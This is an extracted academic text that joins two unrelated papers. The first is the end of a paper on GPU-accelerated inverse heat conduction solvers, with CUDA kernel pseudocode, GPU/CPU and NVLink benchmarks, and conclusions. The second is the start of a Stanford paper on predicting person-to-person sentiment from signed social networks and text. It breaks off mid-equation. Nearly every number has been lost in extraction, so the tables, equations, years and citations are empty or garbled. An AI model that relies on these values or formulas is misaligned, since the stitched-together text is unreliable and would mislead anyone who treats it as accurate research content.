calculate case d; • ( , )–( , ) threads have to calculate case b; • ( , )–( , ) threads have to calculate case c; • ( , )–( , ) and ( , ) threads have to calculate case a. szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. separation of thread indices and the corresponding finite grid locations makes it possible to decrease this divergence significantly. threads inside the first warp should calculate the equations corresponding to the elements at the centre line ( items). the second warp should correspond to the outer surface elements ( items). threads in the next eight warps should be responsible for the inner elements ( elements), and the last warp should solve all the remaining equations ( elements). in this partitioning, only the last warp has divergent threads. the tests show that the gained speed-up is about – %. algorithm description the dhcp function of algorithm contains the main host-side steps of the gpu based direct heat conduction solver algorithm including device memory allocation/deallocation, memory transfers to/from the device and the kernel launch. the dhcp-kernel function shows the device-side steps of the heat transfer simulation according to the presented optimisation steps. results and discussion benchmarking methodology several benchmarks were run with the cpu and the gpu implementations focusing on the following questions: • what is the correlation between the number of cpu cores/gpu devices and the required runtime? a linear correlation is expected because of the weak dependencies between the different tasks. • in the case of gas, which hardware configuration is preferred for a given population size? the expectation is that it is worth using the cpu for small populations and the gpu for larger populations. • the amount of input parameters (htc control points) and output results (fitness values) is relatively small compared to other hpc applications. is the new nvlink technology between the cpu and gpu able to significantly reduce the memory transmission time for these small data transfers? the details of the test environments are as follows: • test environment (te ) – cpu— × intel(r) core(tm) i - ∗ physical cores ∗ logical cores – gpu— × geforce gtx titan black ∗ cuda cores: ∗ memory: gb ∗ link: pcie × + pcie × szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm data parallel dhcp solver require: htc: heat transfer coefficient require: t : initial temperature require: r: reference point inside the work object ensure: s[ ]: recorded temperature values at the reference point : function dhcp-kernel( ) f threadid: unique identifier in ...n·m− : (i,j)←assignthreadtofinitenode(threadid) f ‘warp divergence’ : ti,j ←t fshared array to store actual temp values (‘using shared memory’) : synchronise threads : for t ← to s.length− do : time← t∗dt factual time : temp←ti,j fthread-level variable (actual temp at (i,j) pos) : switch (i,j) do fcalculate heat movement (‘direct heat conduction problem’) : case ( , ) : temp← temp+heattransferinnertopcorner(t,htc) : case ... : ... : end switch : synchronise threads : ti,j ← temp : synchronise threads : if threadid= then ffirst thread calculates the result : s[t]← interpolatetempat(t,r) fcalculate temp at ref. point : end if : end for : end function : : function dhcp(htc,t ,r) : allocategpumemory( ) : copyfromhosttodevice(htc,t ,r) : dhcp-kernel ≪ n∗m ≫ ( ) flaunch n·m parallel threads : copyfromdevicetohost(s) : freegpumemory( ) : return s : end function szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. power cpu p gpu p gpunvlink nv li nk nvlink ram power cpu p gpu p gpunvlink nv li nk nvlink ram figure architecture of the ibm power system s lc for high performance computing. full-size doi: . /peerjcs. /fig- • test environment (te ) – cpu— × ibm power nvl ∗ cores – gpu— × tesla p -sxm ∗ cuda cores: ∗ memory: gb ∗ link: pcie ×+ nvlink te was a windows based desktop machine with two geforce gtx titan black cards installed into the pcie slots. the ihcp codebase was developed using visual studio (with cuda . ) and compiled with the nvidia nvcc compiler to standard bit executables. these binaries were launched from the standard windows command prompt. the c ++ standard std::chrono:high_resolution_clock object was used to measure the execution time. to decrease uncertainty, independent tests were run for all parameter sets, removing the lowest and highest runtimes ( – %) and computing the average of the remaining values. te was an ubuntu linux based power system s lc node in the ibm’s accelerator lab for high performance computing cluster. this is a two socket system equipped with the followings: power core cpus, up to tb system memory, and nvidia p gpus with nvlink connection. this system includes the exclusive nvlink high bandwidth interconnect between the power cpus and nvidia gpus, providing unprecedented bandwith between the cpu and gpus not available on any other platform. each p gpu is connected to one of the cpus with gb/sec bi-directional bandwith nvlink connections, and each pair of p gpus are also directly connected to each other with gb/sec bi-directional bandwidth nvlink connections (fig. ). the same codebase was compiled with gcc and cuda . tools using the arch=compute_ ,code=sm_ flags. the benchmarking methodology was the same as for te . several tests were run using different population sizes (p), where p = , , ... , . as a second parameter, the number of gpu devices (g) was changed, too. g= , for the szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table runtime values for different population sizes with the geforce titan black cards. each col- umn shows the elapsed time for one step of the entire process (memory copy from host to device; kernel execution; memory copy from device to host) in the case of single and dual gpu configurations. the last column shows the speed up total time. size h → d (µs) kernel (µs) d → h (µs) speed-up gpu gpus gpu gpus gpu gpus ∑ gpu∑ gpus , , , , , . , , , , , , . , , , , , . , , , , , , . , , , , , , . , , , , , , , . , , , , , , , . , , , , , , , , , . , , , , , , , , , . , , , , , , , , . table total runtime measured with the p cards using different population size and number of gpus. the last four column shows the speed-up compared to the dual geforce titan black configuration. size p total runtime (µs) speed-up gpu gpus gpus gpus gpu gpus gpus gpus , , , , . . . . , , , , . . . . , , , , . . . . , , , , . . . . , , , , . . . . , , , , . . . . , , , , . . . . , , , , . . . . , , , , . . . . , , , , . . . . , , , , , , . . . . , , , , , , . . . . , , , , , , , . . . . first environment, and g= , , , for the second environment. to compare the cpu and gpu performance, the same tests were run using a different number of cpus (c), where c = , , . the executed steps of the dhcp process are not affected by the actual htc values. therefore, predetermined input values were used for the simulations (instead of random chromosomes from a real genetic algorithm). gpu runtimes table and fig. show the gpu results for te , and table and fig. show the gpu results for te . szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. x x x x x x x ru nti me (µ se c) p o p u l a t i o n s i z e g p u g p u s figure runtime (µs) for different population sizes with geforce titan black cards. full-size doi: . /peerjcs. /fig- as expected, the required runtime inversely linearly correlates with the number of devices. however, in practice, this is a bit more complex, because the series showing the runtimes in both figures are not straight lines, which is caused by the speciality of gpu hardware. this fragmentation is best visible in the case of the one gtx titan black card (black solid series in fig. ). the total runtime is slightly increased from population sizes to , but the required runtime for population size is almost twice as large. the explanation for this phenomenon is based on the gpu architecture. the gtx titan black has streaming multiprocessors (each of them containing processing units), and every multiprocessor can execute four heat transfer simulations simultaneously. accordingly, launching one or parallel simulations takes a similar time. in the case of a greater number of threads, the scheduling (including memory transfers) becomes more complex; consequently, the effect of these steps becomes less sharp. as visible in fig. , these steps already exist for one p card, the runtime increases in every – th step. the p has multiprocessors, each of these can execute one simulation at the same time; therefore, the device can run thermal history generations in parallel. this regularity can also be observed in the case of multiple gpus; for example, in the case of p devices, steps from to ( · = ) and from to ( · · = ) has a significant impact to the runtime. it is worth evaluating as large a population as possible at the same time. thus, the recommended population size should be near to these limits from below ( or ). szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . . x . x . x . x . x ru nti me (µ se c) p o p u l a t i o n s i z e g p u g p u s g p u s g p u s figure runtime (µs) for different population sizes with p cards. full-size doi: . /peerjcs. /fig- table runtime of the dhcp solver for different population sizes and cpu core counts (thread counts). last two columns show the measured speed-up for configurations with cpu cores compared to five cpu cores, and four p gpus compared to cpu cores. population size cores cores speed-up (µs) (µs) c → c c → g , , , , . . , , , , . . , , , , . . , , , , , . . , , , , , . . cpu runtimes table and fig. show the cpu results for te . cpu performance analysis is not in the focus of this paper, but these benchmarks have been run only for the cpu–gpu comparison. as visible, the increase in the number of cores effectively increases the performance (each core is responsible for one heat transfer simulation). on the other side, as the population size was increased, the runtime increased almost linearly. in the case of cpu implementations, the implementation is much simpler. there is no need to transfer input data from the host to the device and the output data from the device to the host, and kernel launch overhead is also missing. therefore, the expectation was that szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . . x . x . x . x . x ru nti me (µ se c) p o p u l a t i o n s i z e c o r e s c o r e s c o r e s figure runtime (µs) for different population sizes with power cpus. full-size doi: . /peerjcs. /fig- the cpu would be faster in the case of small population sizes (where the gpus cannot take advantage of the high number of multiprocessors), but as is visible, this was not true. comparing these results to the gpu runtimes, it is evident that it is not worth using the cpu for any population size. in the case of parallel heat transfer simulations (which is the ideal configuration for the server with cpu cores), all p gpu implementations were – times faster. above this population size, the difference becomes even bigger. in the case of , parallel simulations, the p cards were times faster. it also raises the question of whether it is worth implementing and using a hybrid solution combining the cpus and gpus together. for small population sizes, the answer is no. for example, in the case of chromosomes, if the gpus evaluate of them (needs about ms) and the cpus evaluate only one (needs about , ms), the overall runtime will be higher (max( ms, , ms) = , ms) than the plain gpu implementation. the only occasion when it is worth considering the hybrid implementation is a large population size near the previously explained runtime steps from above. for example, in the case of , chromosomes and two gpus, it would be worth to assign of them to the cpus. the cpu runtime will be about , ms, the gpu runtime for the remaining is , ms. consequently, the overall execution time is , ms. using the gpu implementation exclusively, it requires more, , ms. in the case of four gpus, it would also be possible to find a similar situation, but not in the examined – , population size interval. szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table details of the host to device memory transfer for the geforce titan black cards. the first col- umn shows the size of the population; the second one contains the total required memory for the chro- mosome data. the following columns contain the runtime of device memory allocation and data transfer. data transfer rate (dtr) is the amount of data that is moved in a given time. size data (byte) allocation (µs) copy (µs) dtr ( gb/s) gpu gpus gpus gpus gpu gpus , . . , . . , . . , . . , . . , , . . , , . . , , , , , . . , , , , , . . , , , , , , . . table details of the host to device memory transfer for the p cards. the first column shows the size of the population; the second one contains the total required memory for the chromosome data. the following columns contain the runtime of device memory allocation and data transfer. data transfer rate (dtr) is the amount of data that is moved in a given time. size data (byte) allocation (µs) copy (µs) dtr (gb/s) gpu gpus gpus gpus gpu gpus , , . . , , . . , , . . , , . . , , . . , , . . , , . . , , , , . . , , , , . . , , , , . . data transfer rates during the tests, the data transfer rates were also recorded in the case of te and te . tables – and figs. – show these results. the advance of the new nvlink based power cpu–gpu connection is the high transfer bandwidth between the cpu and the gpu memory. as visible from the results, this works well in practice. table shows that the measured results for te were far from the theoretical maximal transfer speed and it is also visible, that using two gpus have advantages compared to the single gpu configuration. these devices are installed into different pci-e slots, so their data transfers can be processed in parallel (both cards were installed into pci-e × slots, but one of them works at × speed, and the other one at × speed). in the case szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ru nti me (µ se c) p o p u l a t i o n s i z e g p u g p u s figure memory transfer time (µs) for different population sizes with geforce titan black cards. full-size doi: . /peerjcs. /fig- of the cpu–gpu nvlink architecture (table ), the bandwidth was significantly higher (however, the amount of data is still low to achieve the theoretical maximum). it is worth noting that with the two geforce gpus, the memory transfer time is well over twice as fast as with one card; in sharp contrast, for two p cards it is only about % faster than that with one card. and what is more interesting, the usage of three or four devices does not have any benificial effect. the reason for this is that the used p node has a special architecture in that one cpu socket and a maximum of two gpus form an ‘‘island’’ in which any pair of the triad has fast data transfer. in contrast, transfer of data between islands is slower. in the case of ng number of gpus, the ihcp solver code uses ng individual cpu threads to manage the data transfers between the host and the devices. this practice was satisfactory for te , but leads to the experienced strange behaviour for te , because all of these threads were scheduled on the same physical processor. to reach the maximum transfer rate with four devices, multiple cpu threads should be launched and bounded to logical cpus that are appropriately placed for the gpus we intend to use. however, customizing the already existing codebase to a specified architecture is out of the scope of this paper, especially in view of the fact that the nvlink capable server was even significantly faster without any fine-tuning. comparing the gtx and p based configurations, the latter was – times faster. the new nvlink architecture is, therefore, faster, and its overall transfer rate becomes higher with multiple cards. this speed up is achievable in the case of small population sizes szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ru nti me (µ se c) p o p u l a t i o n s i z e g p u g p u s g p u s g p u s figure memory transfer time (µs) for different population sizes with p cards. full-size doi: . /peerjcs. /fig- (it is times quicker in the case of chromosomes and gpus). therefore, this novel architecture is highly recommended for running the ihcp solver gas. conclusions a novel data-parallel algorithm to solve the ihcp and a gpu based implementation was outlined. by using a higher level of parallelism, it can use the processing power of current multi-gpu systems. analysing the architecture of the new p based servers and the runtime results, the conclusions are as follows: • in the case of the ihcp, the runtime of both the cpu and the gpu implementations is nearly linearly depending on the population size, and inversely on the number of processing cores. in the case of gpus, the number of devices and the multiprocessor architecture makes this correlation more complex, the runtime increasing significantly at given (predictable) population sizes. • according to this observation, the recommended population size is close to these points from below for the exclusive gpu implementations. in the case of hybrid systems, the most efficient population size should be close to these points from above. • the nvlink connection between the cpu and gpus can significantly decrease the data transfer time. it is also faster for small population sizes; however, the maximal bandwidth is not achievable in these cases. the results of this work encourage the use of multiple szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. graphics accelerators for the purposes of heat transfer simulations. to fully utilise the processing power of all gpus, it is necessary to reach a higher level of parallelism, but there are several subfields (like the ihcp) where it is feasible. as future work, it is worth fine tuning the algorithm to the new ibm power system architecture. only a naïve porting of the already existing cuda algorithms have been used to this new environment without any major changes. it deserves a deeper study to see why only one block is scheduled into each multiprocessor of the p devices. if it is possible to use some minor configuration changes (decreasing the number of registers or shared memory) to run multiple blocks, then this can double the performance of the system. additional information and declarations funding the author received financial support from the hungarian state and the european union under the efop- . . - - - project. nvidia corporation provided graphics hardware for the gpu benchmarks through the cuda teaching center program. this work was additionally supported by the Únkp- - /i new national excellence program of the ministry of human capacities. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: hungarian state and the european union. nvidia corporation. Únkp- - /i new national excellence program of the ministry of human capacities. competing interests sándor szénási is an academic editor for peerj computer science. author contributions • sándor szénási conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: all raw benchmark data have been uploaded as supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. references alifanov om. . inverse heat transfer problems. new york: springer. beck jv, blackwell b, clair st crj. . inverse heat conduction. new york: wiley. felde i. a. hybrid optimization approach for determination of thermal boundary conditions. in: critical infrastructure protection research: results of the first critical infrastructure protection research project in hungary. cham: springer international publishing, – . felde i. b. liquid quenchant database: determination of heat transfer coefficient during quenching. international journal of microstructure and materials properties ( / ): – doi . /ijmmp. . . felde i, szénási s. . estimation of temporospatial boundary conditions using a particle swarm optimisation technique. international journal of microstructure and materials properties ( / ): – . he x, lee e, wilcox l, munipalli r, pilon l. . a high-order accurate gpu- based radiative transfer equation solver for combustion and propulsion ap- plications. numerical heat transfer, part b: fundamentals ( ): – doi . / . . . humphrey a, meng q, berzins m, harman t. . radiation modeling using the uintah heterogeneous cpu/gpu runtime system. in: st conference of the extreme science and engineering discovery environment. – doi . / . . kim kw, baek sw. . inverse surface radiation analysis in an axisymmetric cylin- drical enclosure using a hybrid genetic algorithm. numerical heat transfer, part a: applications ( ): – doi . / . klimeš l, Štětina j. . a rapid gpu-based heat transfer and solidification model for dynamic computer simulations of continuous steel casting. journal of materials processing technology : – doi . /j.jmatprotec. . . . narang h, wu f, shakur aa. . numerical solutions of heat and mass transfer with the third kind boundary and initial conditions in capillary porous media using programmable graphics hardware. in: the international conference on computer graphics andvirtual reality. – . narang h, wu f, shakur aa. . numerical solutions of heat and mass transfer with the third kind boundary and initial conditions in capillary porous media using programmable graphics hardware. international journal of advanced computer science and applications ( ): – doi . /ijacsa. . . nvidia. . cuda c programming guide. available at http://docs.nvidia.com/cuda/ cuda-c-programming-guide/index.html. oksman p, yu s, kytönen h, louhenkilpi s. . the effective thermal conductivity method in continuous casting of steel. acta polytechnica hungarica ( ): – . satake si, yoshimori h, suzuki t. . optimizations of a gpu accelerated heat conduction equation by a programming of cuda fortran from an anal- ysis of a ptx file. computer physics communications ( ): – doi . /j.cpc. . . . szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijmmp. . http://dx.doi.org/ . / . . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /j.jmatprotec. . . http://dx.doi.org/ . /ijacsa. . http://docs.nvidia.com/cuda/cuda-c-programming-guide/index.html http://docs.nvidia.com/cuda/cuda-c-programming-guide/index.html http://dx.doi.org/ . /j.cpc. . . http://dx.doi.org/ . /peerj-cs. szénási s, felde i. . modified particle swarm optimization method to solve one- dimensional ihcp. in: th ieee international symposium on computational intelli- gence and informatics. piscataway: ieee, – doi . /cinti. . . szénási s, felde i. . configuring genetic algorithm to solve the inverse heat conduc- tion problem. in: ieee th international symposium on applied machine intelligence and informatics. piscataway: ieee, – . verma s, balaji c. . multi-parameter estimation in combined conduction- radiation from a plane parallel participating medium using genetic algo- rithms. international journal of heat and mass transfer ( – ): – doi . /j.ijheatmasstransfer. . . . szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cinti. . http://dx.doi.org/ . /j.ijheatmasstransfer. . . http://dx.doi.org/ . /peerj-cs. exploiting social network structure for person-to-person sentiment analysis robert west stanford university west@cs.stanford.edu hristo s. paskov stanford university hpaskov@stanford.edu jure leskovec stanford university jure@cs.stanford.edu christopher potts stanford university cgpotts@stanford.edu abstract person-to-person evaluations are prevalent in all kinds of discourse and important for es- tablishing reputations, building social bonds, and shaping public opinion. such evaluations can be analyzed separately using signed so- cial networks and textual sentiment analysis, but this misses the rich interactions between language and social context. to capture such interactions, we develop a model that pre- dicts individual a’s opinion of individual b by synthesizing information from the signed social network in which a and b are embed- ded with sentiment analysis of the evaluative texts relating a to b. we prove that this prob- lem is np-hard but can be relaxed to an ef- ficiently solvable hinge-loss markov random field, and we show that this implementation outperforms text-only and network-only ver- sions in two very different datasets involving community-level decision-making: the wiki- pedia requests for adminship corpus and the convote u.s. congressional speech corpus. introduction people’s evaluations of one another are prevalent in all kinds of discourse, public and private, across ages, genders, cultures, and social classes (dunbar, ). such opinions matter for establishing rep- utations and reinforcing social bonds, and they are especially consequential in political contexts, where they take the form of endorsements, accusations, and assessments intended to sway public opinion. the significance of such person-to-person evalu- ations means that there is a pressing need for com- putational models and technologies that can analyze them. research on signed social networks suggests one path forward: how one person will evaluate an- other can often be predicted from the network they are embedded in. linguistic sentiment analysis sug- gests another path forward: one could leverage tex- tual features to predict the valence of evaluative texts describing people. such independent efforts have been successful, but they generally neglect the ways in which social and linguistic features complement each other. in some settings, textual data is sparse but the network structure is largely observed; in oth- ers, text is abundant but the network is partly or un- reliably recorded. in addition, we often see rich in- teractions between the two kinds of information— political allies might tease each other with negative language to enhance social bonds, and opponents of- ten use sarcastically positive language in their criti- cisms. separate sentiment or signed-network mod- els will miss or misread these signals. we develop (sec. ) a graphical model that syn- thesizes network and linguistic information to make more and better predictions about both. the objec- tive of the model is to predict a’s opinion of b using a synthesis of the structural context around a and b inside the social network and sentiment analysis of the evaluative texts relating a to b. we prove that the problem is np-hard but that it can be relaxed to an efficiently solvable hinge-loss markov random field (broecheler et al., ), and we show that this implementation outperforms text-only and network- only versions in two very different datasets involv- ing community-level decision-making: the wikipe- dia requests for adminship corpus, in which wi- kipedia editors discuss and vote on who should be promoted within the wikipedia hierarchy (sec. ), and the convote u.s. congressional speech corpus (thomas et al., ), in which elected officials dis- cuss political topics (sec. ). these corpora differ dramatically in size, in the style and quality of their textual data, and in the structure and observability of their networks. together, they provide a clear pic- ture of how joint models of text and network struc- ture can excel where their component parts cannot. background and related work . sentiment analysis in nlp, the label sentiment analysis covers diverse phenomena concerning how information about emo- tions, attitudes, perspectives, and social identities is conveyed in language (pang and lee, ). most work assumes a dimensional model in which emo- tions are defined primarily by valence/polarity and arousal/intensity (russell, ; feldman barrett and russell, ; rubin and talerico, ), and the dominant application is predicting the valence of product, company, and service reviews. we adopt the conceptual assumptions of this work for our basic sentiment model, but our focus is on person-to-person evaluations and their social conse- quences. this involves elements of work on mod- eling political affiliation (agrawal et al., ; mal- ouf and mullen, ; yu et al., ), bias (yano et al., ; recasens et al., ), and stance on de- bate topics (thomas et al., ; somasundaran and wiebe, ; lin et al., ; anand et al., ), but these aspects of belief and social identity are not our primary concern. rather, we expect them to be predictive of the sentiment classifications we aim to make—e.g., if two people share political views, they will tend to evaluate each other positively. recent work in sentiment analysis has brought in topical, contextual, and social information to make more nuanced predictions about language (jurafsky et al., ; wilson et al., ; blitzer et al., ). we build on these insights with our model, which seeks to modulate sentiment predictions based on network information (and vice versa). . signed-network analysis many social networks encode person-to-person sen- timent information via signed edges between users summarizing their opinions of each other. in this set- ting, one can leverage sociological theories of pair- wise relationships and group-level organization to identify and understand patterns in these relation- ships (heider, ; cartwright and harary, ). balance theory is based on simple intuitions like ‘a friend of my friend is my friend’, ‘an enemy of my enemy is my friend’, and ‘an enemy of my friend is my enemy’. in graph theory, these are statements about the edge signs of triangles of connected nodes: given the signs of two edges, balance theory predicts the third, as summarized in fig. (a), where the two given edges (gray) determine the third (black). for directed relationships, leskovec et al. ( b) formulate an alternative called status theory, which posits that networks organize according to social sta- tus: a node has positive edges to others with higher status and negative edges to those with lower sta- tus. fig. (a) illustrates the structure of various di- rected signed triangles, where the sign of the third edge (black) can be inferred based on the signs and directions of the other two (gray). leskovec et al. ( b) show that signed edges in networks emerge in a manner that is broadly con- sistent with both of these theories and that social- network structure alone can support accurate edge- sign predictions (leskovec et al., a). kunegis et al. ( ) predict hidden positive and negative edges in a scenario where all observed edges are positive. bach et al. ( ) and huang et al. ( ) frame sign prediction as a hinge-loss markov random field, a type of probabilistic graphical model introduced by broecheler et al. ( ). our model combines these ideas with a sentiment model to achieve even more robust predictions. . synthesis of sentiment & network analysis models of sentiment and signed networks have been successful at a variety of tasks. however, missing from the current scientific picture is a deep under- standing of the ways in which sentiment expres- sion and social networks interact. to some extent, these interactions are captured by adding contextual and demographic features to a text-based sentiment model, but those features only approximate the rich relational structure encoded in a signed network. thomas et al. ( ) and tan et al. ( ) cap- italize on this insight using an elaboration of the + + +– +– – –+ – – – + + + social balance theory social status theory + – ? (a) theories of social balance and status + + – – ? ? + ? “you’re one crazy mofo!” “love u! :)” “to whom it may concern” (b) desiderata figure : (a) predictions of social balance and status theories for the bold black edge, given the thin gray edges. balance theory reasons about undirected, status theory about directed, triangles. in the status diagrams, node size signifies social status. a positive edge may be replaced by a negative edge in the opposite direction, and vice versa, without changing the prediction. status theory makes no prediction in the rightmost case. (b) situations of the sort we aim to capture. at left, the network resolves textual ambiguity. at right, the text compensates for edge-label sparsity. graph-cuts approach of pang and lee ( ). they are guided by an assumption of homophily, i.e., that certain social relationships correlate with agreement on certain topics: thomas et al. ( ) use party af- filiation and mentions in speeches to predict voting patterns, and tan et al. ( ) use twitter follows and mentions to predict attitudes about political and social events. related ideas are pursued by ma et al. ( ) and hu et al. ( ), who add terms to their models enforcing homophily between friends with regard to their preferences. we adopt some of the assumptions of the above authors, but our task is fundamentally different in two respects. first, whereas they model person-to- item evaluations, we model person-to-person evalu- ations; these are also the focus of tang et al. ( ), who, though, use an unsigned network, whereas our work is geared toward distinguishing positive and negative edge labels. second, the above models make overarching homophily assumptions, whereas we allow our model to explore the full set of triangle configurations suggested by fig. (a). model here, we argue that combining textual and structural features can help predict edge signs. we formu- late a model, show that it is computationally hard, and provide a relaxed version that is computationally tractable, building on work by bach et al. ( ). . desiderata in many real-world scenarios, rich features are asso- ciated with edges between two people, such as com- ments they made about each other, messages they exchanged, or other behavioral features. such fea- tures may contain a strong sentiment signal useful for predicting edge signs and may be used to fit a conventional sentiment model (sec. . ). however, the sign of an edge also depends on the signs of surrounding edges in the network (sec. . ). a purely edge-feature–based sentiment model can- not account for the network structure, since it rea- sons about edges as independent of each other. we argue that considering sentiment and network structure jointly can result in better predictions than either one on its own. fig. (b) provides two illus- trative examples. here, the gray edge signs are ob- served, while the polarities of the black edges are to be predicted. in the left network, the text of the black edge (‘you’re one crazy mofo!’) might sug- gest a negative polarity. however, a negative black edge would make both triangles inconsistent with balance theory (fig. (a)), whereas a positive black edge makes them consistent with the theory. so, in this case, the network context effectively helps de- tect the teasing, non-literal tone of the statement. in the right network of fig. (b), only one of three edge signs is observed. predicting two pos- itive edges would be consistent with balance the- ory, but the same would be true for predicting two negative edges. the text on the lower black edge (‘to whom it may concern’) does not carry any clear sentiment signal, but the ‘love u! :)’ on the other edge strongly suggests a positive polarity. this lets us conclude that the bottom edge should probably be positive, too, since otherwise the triangle would contradict balance theory. this shows that combin- ing sentiment and network features can help when jointly reasoning about several unknown edge signs. . problem formulation we now formulate a model capable of synthesizing textual and network features. notation. we represent the given social network as a signed graph g = (v,e,x), where the vertices v represent people; the edges e, relationships between people in v ; and the sign vector x ∈{ , }|e| repre- sents edge polarities, i.e., xe = (xe = ) indicates a positive (negative) polarity for edge e ∈ e. some types of relationships imply directed edges (e.g., following a user on twitter, or voting on a can- didate in an election), whereas others imply undi- rected edges (e.g., friendship on facebook, or agree- ment in a network of politicians). we formulate our problem for undirected graphs here, but the exten- sion to directed graphs is straightforward. we de- fine a triangle t = {e ,e ,e } ⊆ e to be a set of three edges that form a cycle, and use t to indi- cate the set of all triangles in g. finally, we use xt = (xe ,xe ,xe )∈{ , } to refer to t’s edge signs. optimization problem. we assume that the struc- ture of the network (i.e., v and e) is fully observed, whereas the edge signs x are only partially observed. further, we assume that we have a sentiment model that outputs, for each edge e independently, an es- timate pe of the probability that e is of positive po- larity, based on textual features associated with e. the task, then, is to infer the unobserved edge signs based on the observed information. the high-level idea is that we want to infer edge signs that ( ) agree with the predictions of the sen- timent model, and ( ) form triangles that agree with social theories of balance and status. it is not always possible to meet both objectives simultaneously for all edges and triangles, so we need to find a trade- off. this gives rise to a combinatorial optimization problem, which we term triangle balance, that seeks to find edge signs x∗ that minimize an objec- tive consisting of both edge and triangle costs: x∗ = arg min x∈{ , }|e| ∑ e∈e c(xe, pe)+ ∑ t∈t d(xt). ( ) the first term is the total edge cost, in which each edge e contributes a cost capturing how much its in- ferred sign xe deviates from the prediction pe of the of course, the entries of x∗ corresponding to observed edges are not variable but fixed to their observed values in eq. . sentiment model. the second term, the total triangle cost, penalizes each triangle t according to how un- desirable its configuration is under its inferred signs xt (e.g., if it contradicts status or balance theory). we use the following edge cost function: c(xe, pe) = λ ( − pe)xe +λ pe( −xe). ( ) here, λ ,λ ∈r+ are tunable parameters that allow for asymmetric costs for positive and negative edges, respectively, and pe is the probability of edge e be- ing positive according to the sentiment model alone. intuitively, the more the inferred edge sign xe devi- ates from the prediction pe of the sentiment model, the higher the edge cost. (note that at most one of the two sum factors of eq. is non-zero.) the triangle cost for triangle t is signified by d(xt), which can only take on distinct values be- cause xt ∈{ , } (in practice, there are symmetries that decrease this number to ). the parameters d(xt) may be tuned so that triangle configurations that agree with social theory have low costs, while those that disagree with it (e.g., ‘the enemy of my friend is my friend’) have high costs. . computational complexity the problem defined in eq. is intuitive, but, as with many combinatorial optimization problems, it is hard to find a good solution. in particular, we sketch a proof of this theorem in appendix a: theorem . triangle balance is np-hard. . relaxation as a markov random field the objective function of eq. may be seen as defin- ing a markov random field (mrf) over the underly- ing social network g, with edge potentials (defined by c) and triangle potentials (defined by d). infer- ence in mrfs (i.e., computing x∗) is a well-stud- ied task for which a variety of methods have been proposed (koller and friedman, ). however, since our problem is np-hard, no method can be ex- pected to find x∗ efficiently. one way of dealing with the computational hardness would be to find an ap- proximate binary solution, using techniques such as gibbs sampling or belief propagation. another op- tion is to consider a continuous relaxation of the bi- nary problem and find an exact non-binary solution whose edge signs are continuous, i.e., xe ∈ [ , ]. we take this latter approach and cast our problem as a hinge-loss markov random field (hl-mrf). this is inspired by bach et al. ( ), who also use an hl-mrf to predict edge signs based on triangle structure, but do not use any edge features. an hl- mrf is an mrf with continuous variables and with potentials that can be expressed as sums of hinge- loss terms of linear functions of the variables (cf. broecheler et al. ( ) for details). hl-mrfs have the advantage that their objective function is convex so that, unlike binary mrfs (as defined by eq. ), exact inference is efficient (bach et al., ). we achieve a relaxation by using sums of hinge- loss terms to interpolate c over the continuous do- main [ , ] and d, over [ , ] (even though they are defined only for binary domains). as a result, the hl-mrf formulation is equivalent to eq. when all xe are binary, but it also handles continuous val- ues gracefully. we now interpret a real-valued ‘sign’ xe ∈ [ , ] as the degree to which e is positive. we start by showing how to transform c: even though it could be used in its current form (eq. ), we create a tighter relaxation by using c̃(xe, pe) = λ ‖xe − pe‖+ +λ ‖pe −xe‖+, ( ) where ‖y‖+ = max{ ,y} is the hinge loss. at most one term can be active for any xe ∈ [ , ] due to the hinge loss, and c(xe, pe) = c̃(xe, pe) for binary xe. to rewrite d, notice that, for any xt ∈{ , } , we can write d as d(xt) = ∑ z∈{ , } d(z) δ(xt,z), ( ) where δ(xt,z) = if xt = z and otherwise. while δ is not convex, we can use f (xt,z) =‖ −‖xt −z‖ ‖+ ( ) as a convex surrogate. when xt is binary, either xt = z so ‖xt −z‖ = or xt = z so ‖xt −z‖ ≥ , and hence f (xt,z) = δ(xt,z). to prove convexity, note that, for any fixed binary z ∈{ , } , ‖x−z‖ =∑ i= |xi −zi| is linear in x ∈ [ , ] , since |xi −zi| equals either xi (if zi = ) or −xi (if zi = ). it fol- lows that f is a hinge-loss function of a linear trans- formation of xt and therefore convex in xt . training testing evidence to infer random sampling bfs sampling u v figure : options for training and testing our model. requiring the triangle cost d(z) to be nonnegative for all triangle types z ∈{ , } , we can use d̃(xt) = ∑ z∈{ , } 